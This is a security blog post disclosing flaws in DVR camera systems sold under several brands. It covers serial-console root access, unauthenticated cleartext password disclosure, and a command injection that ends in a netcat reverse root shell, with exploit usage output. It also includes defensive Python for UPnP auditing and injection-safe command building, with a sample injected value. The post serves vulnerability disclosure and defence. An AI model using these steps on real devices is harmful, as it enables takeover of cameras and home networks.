Sunday, August 23, 2020

Swann Song - DVR Insecurity

"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post serves as the "swan song" for a whole slew of DVR security systems. With that being said, I will refer to the lyrical master MC Hammer: let's turn this mutha' out.

I recently had a chance to get my hands on a 4 channel DVR system sold under a handful of company banners (4/8/16 channels) - Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc. A few device model numbers are DVR04B, DVR08B, DVR-16CIF and DVR16B.

After firing up the device and putting it on the network I noticed that it was running a telnet server; unfortunately the device does not appear to come configured with an easy/weak login :(. Time to open it up and see what's going on :)

After opening the device up something grabbed my attention right away....

The highlighted header looked like a pretty good possibility for a serial port, time to break out the multi-meter and check. After a couple power cycles, the header was indeed a serial port :)

After hooking up my USB-to-serial breakout board to the device's serial port and guessing at the following serial settings, 115200 8-N-1, I was stuck looking at a login prompt without a working login or password.

Lucky for me, the device startup can be reconfigured using the U-Boot environment. The environment variable "bootargs" can be adjusted to boot the Linux system into single user mode by appending "single" to the end of the existing settings:
setenv bootargs mem=68M console=ttyAMA0,115200 root=1f01 rootfstype=jffs2 mtdparts=physmap-flash.0:4M(boot),12M(rootfs),14M(app),2M(para) busclk=220000000 single



This change to the bootargs variable is only temporary at this point; if we were to power cycle the device the change would be lost. It is possible to write these changes to the device, but in this case we only want to boot into single user mode once. To boot the device you need to tell the boot loader where the kernel exists in memory; this value can be found in the default environment variable "bootdcmd".


Once the device is booted up in single user mode, the root password can be reset and the device rebooted. Telnet now works, but what fun is that when these devices don't normally expose telnet to the internet :). Now for the real fun...

Looking at the device, the default configuration is set up to auto-magically use the power of the dark lord Satan (UPnP) to map a few ports on your router (if it supports UPnP). One of the ports that it will expose is for the web (ActiveX) application and the other is the actual comms channel the device uses (port 9000).

The first item I looked at was the web application that is used to view the video streams remotely and configure the device. The first thing that I found with this lovely device is that the comms channel (9000) did not appear to do any authentication on requests made to it...Strike 1. I imagine the ActiveX application that is used to connect to the device could be patched to just skip the login screen, but that seems like a lot of work, especially when there are much easier ways in.

The next thing I saw was a bit shocking...when you access the application's user accounts page, the device sends the application all the information about the accounts stored on the device. This includes the login and password. In clear text. Strike 2. I created a small PoC in python that will pull the password from a vulnerable device:
python getPass.py 192.168.10.69
[*]Host: 192.168.10.69
[+]Username: admin
[+]Password: 123456
Script can be found here.
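The UPnP behaviour above is what turns a LAN-only bug into an internet-exposed one, so the first thing a defender should check is what the router has actually been told to forward. The Python below is an added example (my own code, not part of the original post or the getPass.py script): it parses the IGD GetGenericPortMappingEntryResponse messages a router returns for its WANIPConnection:1 service and flags any mapping that forwards a public port to the DVR service ports named in the post (9000 and the web port). The SOAP responses are constructed samples; the request builder assumes you have already found the router's control URL via SSDP, which the code does not do.

```python
import xml.etree.ElementTree as ET

# Fields returned by the IGD action GetGenericPortMappingEntry (WANIPConnection:1).
FIELDS = ("NewRemoteHost", "NewExternalPort", "NewProtocol", "NewInternalPort",
          "NewInternalClient", "NewEnabled", "NewPortMappingDescription", "NewLeaseDuration")

# Ports the post says the DVR maps through UPnP: the comms channel (9000) and the web app (80).
DVR_PORTS = {9000, 80}

# Constructed sample responses, as a router would return them for indexes 0, 1 and 2.
SAMPLE_RESPONSES = [
    """<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:GetGenericPortMappingEntryResponse xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewRemoteHost></NewRemoteHost>
      <NewExternalPort>9000</NewExternalPort>
      <NewProtocol>TCP</NewProtocol>
      <NewInternalPort>9000</NewInternalPort>
      <NewInternalClient>192.168.10.69</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewPortMappingDescription>DVR</NewPortMappingDescription>
      <NewLeaseDuration>0</NewLeaseDuration>
    </u:GetGenericPortMappingEntryResponse>
  </s:Body>
</s:Envelope>""",
    """<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:GetGenericPortMappingEntryResponse xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewRemoteHost></NewRemoteHost>
      <NewExternalPort>3074</NewExternalPort>
      <NewProtocol>UDP</NewProtocol>
      <NewInternalPort>3074</NewInternalPort>
      <NewInternalClient>192.168.10.20</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewPortMappingDescription>console</NewPortMappingDescription>
      <NewLeaseDuration>0</NewLeaseDuration>
    </u:GetGenericPortMappingEntryResponse>
  </s:Body>
</s:Envelope>""",
    """<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:GetGenericPortMappingEntryResponse xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewRemoteHost></NewRemoteHost>
      <NewExternalPort>8080</NewExternalPort>
      <NewProtocol>TCP</NewProtocol>
      <NewInternalPort>80</NewInternalPort>
      <NewInternalClient>192.168.10.69</NewInternalClient>
      <NewEnabled>0</NewEnabled>
      <NewPortMappingDescription>DVR web</NewPortMappingDescription>
      <NewLeaseDuration>0</NewLeaseDuration>
    </u:GetGenericPortMappingEntryResponse>
  </s:Body>
</s:Envelope>""",
]


def build_request(index: int) -> str:
    """SOAP body asking the IGD for mapping number `index`. POST it to the
    WANIPConnection control URL (assumed to be discovered separately via SSDP)
    with SOAPAction set to the WANIPConnection:1#GetGenericPortMappingEntry action."""
    return (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:GetGenericPortMappingEntry '
        'xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
        '<NewPortMappingIndex>%d</NewPortMappingIndex>'
        '</u:GetGenericPortMappingEntry></s:Body></s:Envelope>' % int(index)
    )


def parse_mapping(soap_xml: str) -> dict:
    """Parse one GetGenericPortMappingEntryResponse into a dict of its fields."""
    root = ET.fromstring(soap_xml)
    resp = next((el for el in root.iter()
                 if el.tag.endswith("GetGenericPortMappingEntryResponse")), None)
    if resp is None:
        raise ValueError("not a GetGenericPortMappingEntryResponse")
    out = {}
    for child in resp:
        tag = child.tag.split("}")[-1]  # drop any namespace prefix
        if tag in FIELDS:
            out[tag] = (child.text or "").strip()
    return out


def is_dvr_exposure(mapping: dict, dvr_ports=DVR_PORTS) -> bool:
    """True if an enabled mapping forwards an internet-facing port to a DVR service port."""
    try:
        internal = int(mapping["NewInternalPort"])
    except (KeyError, ValueError):
        return False
    return mapping.get("NewEnabled", "1") == "1" and internal in dvr_ports


def audit_mappings(responses) -> list:
    """Return (external port, internal client, internal port) for every DVR-style exposure."""
    findings = []
    for xml_text in responses:
        m = parse_mapping(xml_text)
        if is_dvr_exposure(m):
            findings.append((int(m["NewExternalPort"]), m["NewInternalClient"], int(m["NewInternalPort"])))
    return findings


if __name__ == "__main__":
    for ext, host, internal in audit_mappings(SAMPLE_RESPONSES):
        print("[!] public port %d -> %s:%d looks like a DVR service mapping" % (ext, host, internal))
```

Against the constructed samples the audit reports only the enabled 9000 -> 192.168.10.69:9000 mapping; the disabled 8080 -> 80 entry is skipped. In practice you walk the indexes with build_request until the router returns a SOAP fault (SpecifiedArrayIndexInvalid), and the cheapest fix for this class of device is simply disabling UPnP on the router.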

After owning the device at the "application" level, I figured it was time to go deeper.

Port 9000 is served by a binary named 'raysharpdvr'. I pulled the binary off the device and started going through it looking for interesting stuff. The first thing I noticed was that the device was using the "system" call to carry out some actions; after chasing down these calls and not seeing much, the following popped up:


"sprintf" with user input into a "system", that'll do it. There are a couple of problems to overcome with this. First, in order to use this vector for command injection you must configure the device to use "ppp" - this will cause the device to go offline and we will not be able to interact with it further :(. We can get around this issue by injecting a call to the DHCP client application ("udhcpc") - this will cause the device to use DHCP to get its network information, bypassing the previous "ppp" config.

The other issue is that once we have reconfigured the device to run our command, it needs to be restarted before it will execute (it's part of the init scripts). The application does not actually provide a way to reboot the device using the web interface; there is a section that says 'reboot', but when it is triggered nothing happens and some debugging information is displayed in the serial console saying the functionality is not implemented. Lucky for us there are plenty of overflow bugs in this device that will lead to a crash :). The device has a watchdog that polls the system to check if the "raysharpdvr" application is running and if it does not see it, it initiates a system reboot - very helpful.

With those two issues out of the way the only thing left is HOW to talk to our remote root shell that is waiting for us....luckily the device ships with netcat built into busybox, -e flag and all :)
Usage: sploit.py <target> <connectback host> <connectback port>
$ python sploit.py 192.168.10.69 192.168.10.66 9999
[*]Sending Stage 1
[*]Sending Stage 2
[*]Rebooting the server with crash....
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:9999
Strike 3, get this weak shit off my network. The script can be found here. The script relies on the web application running on port 80; this is not always the case, so you may need to adjust the script if your device listens on another port. It is also worth noting that it may take a few minutes for the device to reboot and connect back to you.
Unfortunately the web server that runs on this device does not behave correctly (no response headers), so I do not believe finding these online is as easy as searching Shodan; however, it is possible to fingerprint vulnerable devices by looking for hosts with port 9000 open.
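The root cause of the command injection is a configuration value formatted straight into a command line that a shell then parses. The Python below is an added example (my own code, not the firmware's and not the sploit.py script) showing that pattern next to a hardened version of the same job: the interface name is checked against a strict allowlist and the program is invoked with an argument vector, so no shell ever sees the value. The `udhcpc -i <iface>` command shape and the interface-name policy are illustrative assumptions; the block only builds command lines and runs nothing unless you call run_dhcp_client yourself.

```python
import re
import subprocess

# Constructed allowlist for an interface name: 1-15 characters of [A-Za-z0-9_.-].
# Deliberately stricter than what the kernel accepts; anything else is rejected.
IFACE_RE = re.compile(r"[A-Za-z0-9_.-]{1,15}")

# Characters that change how a POSIX shell parses a command line.
SHELL_META = set(";|&$`<>()\n\"'\\ \t")


def build_command_unsafe(iface: str) -> str:
    """Vulnerable pattern: the config value is formatted into a single string that
    will be handed to a shell, the Python equivalent of sprintf() + system()."""
    return "udhcpc -i %s" % iface


def has_shell_metachars(value: str) -> bool:
    """Detector for values that would alter the shell's parse of the command line;
    useful when reviewing stored config for tampering."""
    return any(ch in SHELL_META for ch in value)


def validate_iface(iface: str) -> str:
    """Allowlist check; raises on anything that is not a plain interface name."""
    if not IFACE_RE.fullmatch(iface):
        raise ValueError("rejected interface name: %r" % iface)
    return iface


def build_command_safe(iface: str) -> list:
    """Hardened pattern: validate first, then build an argv so the value is always
    passed as one literal argument and never interpreted by a shell."""
    return ["udhcpc", "-i", validate_iface(iface)]


def run_dhcp_client(iface: str) -> int:
    """Run the hardened command without a shell (shell=False); returns the exit code."""
    return subprocess.run(build_command_safe(iface), shell=False, check=False).returncode


if __name__ == "__main__":
    tampered = "eth0; echo injected"
    print("unsafe :", build_command_unsafe(tampered))
    print("flagged:", has_shell_metachars(tampered))
    try:
        build_command_safe(tampered)
    except ValueError as exc:
        print("safe   :", exc)
```

With a tampered value the unsafe builder yields `udhcpc -i eth0; echo injected`, two commands as far as a shell is concerned, while the hardened builder refuses the value before anything is executed. In C the same fix is validating the value and calling execve with an argv instead of sprintf and system.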

tl;dr: A whole slew of security DVR devices are vulnerable to an unauthenticated login disclosure and unauthenticated command injection.